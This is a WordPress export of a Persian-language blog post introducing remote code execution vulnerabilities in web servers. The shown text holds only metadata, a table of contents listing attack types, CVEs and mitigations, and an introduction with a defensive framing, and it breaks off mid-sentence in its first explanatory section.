{"id":105172,"date":"2025-04-08T21:48:43","date_gmt":"2025-04-08T17:18:43","guid":{"rendered":"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/"},"modified":"2025-04-08T21:48:43","modified_gmt":"2025-04-08T17:18:43","slug":"%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev","status":"publish","type":"post","link":"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/","title":{"rendered":"\u06a9\u0627\u0628\u0648\u0633 \u0633\u0631\u0648\u0631 \u0648\u0628 &#8211; \u062c\u0627\u0645\u0639\u0647 dev"},"content":{"rendered":"<div data-article-id=\"2392058\" id=\"article-body\">\n<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_85 counter-hierarchy ez-toc-counter-rtl ez-toc-grey ez-toc-container-direction\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title\" style=\"cursor:inherit\">\u0641\u0647\u0631\u0633\u062a \u0645\u0637\u0627\u0644\u0628<\/p>\n<span class=\"ez-toc-title-toggle\"><a href=\"#\" class=\"ez-toc-pull-right ez-toc-btn ez-toc-btn-xs ez-toc-btn-default ez-toc-toggle\" aria-label=\"Toggle Table of Content\"><span class=\"ez-toc-js-icon-con\"><span class=\"\"><span class=\"eztoc-hide\" style=\"display:none;\">Toggle<\/span><span class=\"ez-toc-icon-toggle-span\"><svg style=\"fill: #999;color:#999\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewBox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #999;color:#999\" class=\"arrow-unsorted-368013\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewBox=\"0 0 24 24\" version=\"1.2\" baseProfile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 
6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 .5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/span><\/span><\/a><\/span><\/div>\n<nav><ul class='ez-toc-list ez-toc-list-level-1 ' ><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#%D9%85%D9%82%D8%AF%D9%85%D9%87\" >\u0645\u0642\u062f\u0645\u0647<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#%D8%A7%D8%AC%D8%B1%D8%A7%DB%8C_%DA%A9%D8%AF_%D8%A7%D8%B2_%D8%B1%D8%A7%D9%87_%D8%AF%D9%88%D8%B1_RCE_%DA%86%DB%8C%D8%B3%D8%AA%D8%9F\" >\u0627\u062c\u0631\u0627\u06cc \u06a9\u062f \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631 (RCE) \u0686\u06cc\u0633\u062a\u061f<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-3\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#%D8%A7%D9%86%D9%88%D8%A7%D8%B9_%D8%A2%D8%B3%DB%8C%D8%A8_%D9%BE%D8%B0%DB%8C%D8%B1%DB%8C_RCE_%D9%85%D8%B4%D8%AA%D8%B1%DA%A9_%D8%AF%D8%B1_%D8%B3%D8%B1%D9%88%D8%B1%D9%87%D8%A7%DB%8C_%D9%88%D8%A8\" >\u0627\u0646\u0648\u0627\u0639 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc RCE \u0645\u0634\u062a\u0631\u06a9 \u062f\u0631 \u0633\u0631\u0648\u0631\u0647\u0627\u06cc \u0648\u0628<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-4\" 
href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#%D8%A2%D8%B3%DB%8C%D8%A8_%D9%BE%D8%B0%DB%8C%D8%B1%DB%8C_%D9%87%D8%A7%DB%8C_%D8%AA%D8%B2%D8%B1%DB%8C%D9%82\" >\u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627\u06cc \u062a\u0632\u0631\u06cc\u0642:<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-5\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#%D8%AA%D8%B2%D8%B1%DB%8C%D9%82_%D9%81%D8%B1%D9%85%D8%A7%D9%86\" >\u062a\u0632\u0631\u06cc\u0642 \u0641\u0631\u0645\u0627\u0646<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-6\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#%D8%AA%D8%B2%D8%B1%DB%8C%D9%82_SQL_%D8%A8%D9%87_RCE\" >\u062a\u0632\u0631\u06cc\u0642 SQL \u0628\u0647 RCE<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-7\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#%D8%AA%D8%B2%D8%B1%DB%8C%D9%82_LDAP\" >\u062a\u0632\u0631\u06cc\u0642 LDAP<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-8\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#%D9%86%D8%A7%D8%A7%D9%85%D9%86_%D8%B4%D8%AF%D9%86_%D9%86%D8%A7%D8%A7%D9%85%D9%86_%D9%BE%D8%B4%D8%AA%DB%8C_%D9%BE%D9%86%D9%87%D8%A7%D9%86\" >\u0646\u0627\u0627\u0645\u0646 \u0634\u062f\u0646 \u0646\u0627\u0627\u0645\u0646: \u067e\u0634\u062a\u06cc \u067e\u0646\u0647\u0627\u0646<\/a><ul class='ez-toc-list-level-3' 
><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-9\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#%D9%85%D8%AB%D8%A7%D9%84_%D8%AF%D8%B1_%D9%81%D9%84%D8%A7%D8%B3%DA%A9_%D9%BE%D8%A7%DB%8C%D8%AA%D9%88%D9%86\" >\u0645\u062b\u0627\u0644 \u062f\u0631 \u0641\u0644\u0627\u0633\u06a9 \u067e\u0627\u06cc\u062a\u0648\u0646:<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-10\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#%D8%A2%D8%B3%DB%8C%D8%A8_%D9%BE%D8%B0%DB%8C%D8%B1%DB%8C_%D9%87%D8%A7%DB%8C_%DA%AF%D9%86%D8%AC%D8%A7%D9%86%D8%AF%D9%86_%D9%BE%D8%B1%D9%88%D9%86%D8%AF%D9%87_LFI_%D9%88_RFI\" >\u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627\u06cc \u06af\u0646\u062c\u0627\u0646\u062f\u0646 \u067e\u0631\u0648\u0646\u062f\u0647 (LFI \u0648 RFI)<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-11\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#%D8%A2%D8%B3%DB%8C%D8%A8_%D9%BE%D8%B0%DB%8C%D8%B1%DB%8C_%D9%87%D8%A7%DB%8C_%D8%A8%D8%A7%D8%B1%DA%AF%D8%B0%D8%A7%D8%B1%DB%8C_%D9%BE%D8%B1%D9%88%D9%86%D8%AF%D9%87\" >\u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627\u06cc \u0628\u0627\u0631\u06af\u0630\u0627\u0631\u06cc \u067e\u0631\u0648\u0646\u062f\u0647<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-12\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#%D8%B3%D8%B1%D8%B1%DB%8C%D8%B2_%D8%A8%D8%A7%D9%81%D8%B1_%D9%82%D8%AF%DB%8C%D9%85%DB%8C_%D8%A7%D9%85%D8%A7_%D8%B7%D9%84%D8%A7\" 
>\u0633\u0631\u0631\u06cc\u0632 \u0628\u0627\u0641\u0631: \u0642\u062f\u06cc\u0645\u06cc \u0627\u0645\u0627 \u0637\u0644\u0627<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-13\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#%D8%AA%D8%B2%D8%B1%DB%8C%D9%82_%D8%A7%D9%84%DA%AF%D9%88%DB%8C_%D8%B3%D9%85%D8%AA_%D8%B3%D8%B1%D9%88%D8%B1_SSTI\" >\u062a\u0632\u0631\u06cc\u0642 \u0627\u0644\u06af\u0648\u06cc \u0633\u0645\u062a \u0633\u0631\u0648\u0631 (SSTI)<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-14\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#%DA%86%DA%AF%D9%88%D9%86%D9%87_%D9%87%DA%A9%D8%B1%D9%87%D8%A7_%D8%A7%D8%B2_RCE_%D8%A7%D8%B3%D8%AA%D9%81%D8%A7%D8%AF%D9%87_%D9%85%DB%8C_%DA%A9%D9%86%D9%86%D8%AF_%DA%AF%D8%A7%D9%85_%D8%A8%D9%87_%DA%AF%D8%A7%D9%85\" >\u0686\u06af\u0648\u0646\u0647 \u0647\u06a9\u0631\u0647\u0627 \u0627\u0632 RCE \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc \u06a9\u0646\u0646\u062f (\u06af\u0627\u0645 \u0628\u0647 \u06af\u0627\u0645)<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-15\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#1_%D8%B4%D9%86%D8%A7%D8%B3%D8%A7%DB%8C%DB%8C\" >1. \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-16\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#2_%D8%AA%DA%A9%D9%86%DB%8C%DA%A9_%D9%87%D8%A7%DB%8C_%D8%A8%D9%87%D8%B1%D9%87_%D8%A8%D8%B1%D8%AF%D8%A7%D8%B1%DB%8C\" >2. 
\u062a\u06a9\u0646\u06cc\u06a9 \u0647\u0627\u06cc \u0628\u0647\u0631\u0647 \u0628\u0631\u062f\u0627\u0631\u06cc<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-17\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#3_%D8%AA%D8%AD%D9%88%DB%8C%D9%84_%D8%A8%D8%A7%D8%B1\" >3. \u062a\u062d\u0648\u06cc\u0644 \u0628\u0627\u0631<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-18\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#4_%D9%BE%D8%B3_%D8%A7%D8%B2_%D8%A8%D9%87%D8%B1%D9%87_%D8%A8%D8%B1%D8%AF%D8%A7%D8%B1%DB%8C\" >4. \u067e\u0633 \u0627\u0632 \u0628\u0647\u0631\u0647 \u0628\u0631\u062f\u0627\u0631\u06cc<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-19\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#%D8%AA%D8%A3%D8%AB%DB%8C%D8%B1_%D8%AD%D9%85%D9%84%D8%A7%D8%AA_%D9%85%D9%88%D9%81%D9%82%DB%8C%D8%AA_%D8%A2%D9%85%DB%8C%D8%B2_RCE\" >\u062a\u0623\u062b\u06cc\u0631 \u062d\u0645\u0644\u0627\u062a \u0645\u0648\u0641\u0642\u06cc\u062a \u0622\u0645\u06cc\u0632 RCE<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-20\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#%D9%85%D8%B7%D8%A7%D9%84%D8%B9%D8%A7%D8%AA_%D9%85%D9%88%D8%B1%D8%AF%DB%8C_RCE_%D8%A8%D8%A7_%D9%85%D8%B4%D8%AE%D8%B5%D8%A7%D8%AA_%D8%A8%D8%A7%D9%84%D8%A7\" >\u0645\u0637\u0627\u0644\u0639\u0627\u062a \u0645\u0648\u0631\u062f\u06cc RCE \u0628\u0627 \u0645\u0634\u062e\u0635\u0627\u062a \u0628\u0627\u0644\u0627<\/a><ul class='ez-toc-list-level-4' 
><li class='ez-toc-heading-level-4'><a class=\"ez-toc-link ez-toc-heading-21\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#1_Ivanti_Connect_Secure_%D9%88_Policy_Secure_CVE-2024-21887_CVE-2023-46805\" >1. Ivanti Connect Secure \u0648 Policy Secure (CVE-2024-21887 &#038; CVE-2023-46805)<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-4'><a class=\"ez-toc-link ez-toc-heading-22\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#2_Apache_Struts_2_CVE-2024-53677\" >2. Apache Struts 2 (CVE-2024-53677)<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-4'><a class=\"ez-toc-link ez-toc-heading-23\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#3_PHP_%D8%AF%D8%B1_%D9%88%DB%8C%D9%86%D8%AF%D9%88%D8%B2_CVE-2024-4577\" >3. PHP \u062f\u0631 \u0648\u06cc\u0646\u062f\u0648\u0632 (CVE-2024-4577)<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-4'><a class=\"ez-toc-link ez-toc-heading-24\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#4_Apache_Tomcat_CVE-2025-24813\" >4. Apache Tomcat (CVE-2025-24813)<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-4'><a class=\"ez-toc-link ez-toc-heading-25\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#5_%D8%B3%D8%A7%DB%8C%D8%B1_%D8%B3%DB%8C%D8%B3%D8%AA%D9%85_%D8%B9%D8%A7%D9%85%D9%84_%D9%87%D8%A7%DB%8C_%D8%A2%D8%B3%DB%8C%D8%A8_%D9%BE%D8%B0%DB%8C%D8%B1\" >5. 
\u0633\u0627\u06cc\u0631 \u0633\u06cc\u0633\u062a\u0645 \u0639\u0627\u0645\u0644 \u0647\u0627\u06cc \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631<\/a><\/li><\/ul><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-26\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#%D8%A7%D8%B3%D8%AA%D8%B1%D8%A7%D8%AA%DA%98%DB%8C_%D9%87%D8%A7%DB%8C_%DA%A9%D8%A7%D9%87%D8%B4\" >\u0627\u0633\u062a\u0631\u0627\u062a\u0698\u06cc \u0647\u0627\u06cc \u06a9\u0627\u0647\u0634<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-27\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#%D8%A8%DB%8C%D9%86%D8%B4_%D9%85%D8%AA%D8%AE%D8%B5%D8%B5\" >\u0628\u06cc\u0646\u0634 \u0645\u062a\u062e\u0635\u0635<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-28\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#%D9%BE%D8%A7%DB%8C%D8%A7%D9%86\" >\u067e\u0627\u06cc\u0627\u0646<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-29\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#%D8%BA%D8%B0%D8%A7%DB%8C_%D8%A7%D8%B5%D9%84%DB%8C\" >\u063a\u0630\u0627\u06cc \u0627\u0635\u0644\u06cc:<\/a><\/li><\/ul><\/li><\/ul><\/nav><\/div>\n<h2><span class=\"ez-toc-section\" id=\"%D9%85%D9%82%D8%AF%D9%85%D9%87\"><\/span>\n<p>  <strong>\u0645\u0642\u062f\u0645\u0647<\/strong><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>\u062a\u0635\u0648\u0631 \u06a9\u0646\u06cc\u062f \u06a9\u0647 \u06cc\u06a9 
\u063a\u0631\u06cc\u0628\u0647 \u0642\u0627\u062f\u0631 \u0627\u0633\u062a \u0628\u062f\u0648\u0646 \u0627\u062c\u0627\u0632\u0647 \u0634\u0645\u0627 \u062f\u0631 \u067e\u0634\u062a \u0635\u0641\u062d\u0647 \u0631\u0627\u06cc\u0627\u0646\u0647 \u062e\u0648\u062f \u0628\u0646\u0634\u06cc\u0646\u062f. \u0627\u06cc\u0646 \u0648\u0627\u0642\u0639\u06cc\u062a \u0648\u062d\u0634\u062a\u0646\u0627\u06a9 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627\u06cc \u0627\u062c\u0631\u0627\u06cc \u06a9\u062f \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631 (RCE) \u0627\u0633\u062a. \u062f\u0631 \u0633\u0627\u0644\u0647\u0627\u06cc \u0627\u062e\u06cc\u0631 \u060c \u0632\u06cc\u0631\u0633\u0627\u062e\u062a \u0647\u0627\u06cc \u0645\u0647\u0645 \u060c \u0627\u0632 \u062c\u0645\u0644\u0647 \u0634\u0631\u06a9\u062a \u0647\u0627\u06cc \u0628\u0631\u062a\u0631 \u0648 \u0633\u06cc\u0633\u062a\u0645 \u0647\u0627\u06cc \u062f\u0648\u0644\u062a\u06cc \u060c \u0642\u0631\u0628\u0627\u0646\u06cc \u062d\u0645\u0644\u0627\u062a \u0633\u0627\u06a9\u062a \u0648 \u062f\u0631 \u0639\u06cc\u0646 \u062d\u0627\u0644 \u0648\u06cc\u0631\u0627\u0646\u06af\u0631 RCE \u0634\u062f\u0647 \u0627\u0646\u062f. \u062a\u0646\u0647\u0627 \u062f\u0631 \u0698\u0627\u0646\u0648\u06cc\u0647 \u0633\u0627\u0644 2024 \u060c \u0628\u06cc\u0634 \u0627\u0632 2\u060c000 \u062f\u0633\u062a\u06af\u0627\u0647 VPN Ivanti \u0628\u0647 \u062e\u0637\u0631 \u0627\u0641\u062a\u0627\u062f\u0646\u062f &#8211; \u0628\u0627\u0632\u0646\u0634\u0627\u0646\u06cc \u06a9\u0627\u0631\u062e\u0627\u0646\u0647.<\/p>\n<p>\u0627\u06cc\u0646 \u0645\u0642\u0627\u0644\u0647 \u062f\u0631 \u0627\u0639\u0645\u0627\u0642 \u062f\u0646\u06cc\u0627\u06cc RCE \u0633\u0631\u0648\u0631\u0647\u0627\u06cc \u0648\u0628 \u0631\u0627 \u0647\u062f\u0641 \u0642\u0631\u0627\u0631 \u0645\u06cc \u062f\u0647\u062f. 
\u0634\u0645\u0627 \u06cc\u0627\u062f \u0645\u06cc \u06af\u06cc\u0631\u06cc\u062f \u06a9\u0647 \u0645\u0647\u0627\u062c\u0645\u0627\u0646 \u0686\u06af\u0648\u0646\u0647 \u0627\u0632 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627 \u060c \u0686\u06af\u0648\u0646\u06af\u06cc \u0645\u062a\u062d\u0645\u0644 \u0634\u062f\u0646 \u0633\u0627\u0632\u0645\u0627\u0646 \u0647\u0627\u06cc \u0648\u0627\u0642\u0639\u06cc \u0648 \u0686\u06af\u0648\u0646\u06af\u06cc \u0645\u062d\u0627\u0641\u0638\u062a \u062f\u0631 \u0628\u0631\u0627\u0628\u0631 \u0622\u0646\u0647\u0627 \u0633\u0648\u0621 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc \u06a9\u0646\u0646\u062f. \u0628\u0627 \u062a\u0628\u062f\u06cc\u0644 \u0634\u062f\u0646 \u062d\u0645\u0644\u0627\u062a \u067e\u06cc\u0686\u06cc\u062f\u0647 \u062a\u0631 \u0648 \u06af\u0633\u062a\u0631\u062f\u0647 \u062a\u0631 \u060c \u062f\u0631\u06a9 RCE \u062f\u06cc\u06af\u0631 \u0627\u062e\u062a\u06cc\u0627\u0631\u06cc \u0646\u06cc\u0633\u062a &#8211; \u0636\u0631\u0648\u0631\u06cc \u0627\u0633\u062a.<\/p>\n<p><strong>\u067e\u0627\u06cc\u0627\u0646 \u0646\u0627\u0645\u0647<\/strong>: \u0627\u06cc\u0646 \u0648\u0628\u0644\u0627\u06af \u0628\u0647 \u0628\u0631\u0631\u0633\u06cc \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627\u06cc RCE \u062f\u0631 \u0633\u0631\u0648\u0631\u0647\u0627\u06cc \u0648\u0628 \u060c \u0627\u0631\u0627\u0626\u0647 \u0628\u06cc\u0646\u0634 \u0641\u0646\u06cc \u060c \u0646\u0645\u0648\u0646\u0647 \u0647\u0627\u06cc \u062f\u0646\u06cc\u0627\u06cc \u0648\u0627\u0642\u0639\u06cc \u0648 \u0627\u0633\u062a\u0631\u0627\u062a\u0698\u06cc \u0647\u0627\u06cc \u062f\u0641\u0627\u0639\u06cc \u0639\u0645\u0644\u06cc \u0628\u0631\u0627\u06cc \u0639\u0644\u0627\u0642\u0647 \u0645\u0646\u062f\u0627\u0646 \u0628\u0647 \u0641\u0646\u0627\u0648\u0631\u06cc \u0648 \u0645\u062a\u062e\u0635\u0635\u0627\u0646 \u0645\u06cc 
\u067e\u0631\u062f\u0627\u0632\u062f.<\/p>\n<hr\/>\n<h2><span class=\"ez-toc-section\" id=\"%D8%A7%D8%AC%D8%B1%D8%A7%DB%8C_%DA%A9%D8%AF_%D8%A7%D8%B2_%D8%B1%D8%A7%D9%87_%D8%AF%D9%88%D8%B1_RCE_%DA%86%DB%8C%D8%B3%D8%AA%D8%9F\"><\/span>\n<p>  <strong>\u0627\u062c\u0631\u0627\u06cc \u06a9\u062f \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631 (RCE) \u0686\u06cc\u0633\u062a\u061f<\/strong><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>\u0627\u062c\u0631\u0627\u06cc \u06a9\u062f \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631 (RCE) \u06cc\u06a9 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0627\u0645\u0646\u06cc\u062a\u06cc \u0627\u0633\u062a \u06a9\u0647 \u0628\u0647 \u0645\u0647\u0627\u062c\u0645\u0627\u0646 \u0627\u062c\u0627\u0632\u0647 \u0645\u06cc \u062f\u0647\u062f \u06a9\u062f \u062f\u0644\u062e\u0648\u0627\u0647 \u0631\u0627 \u0631\u0648\u06cc 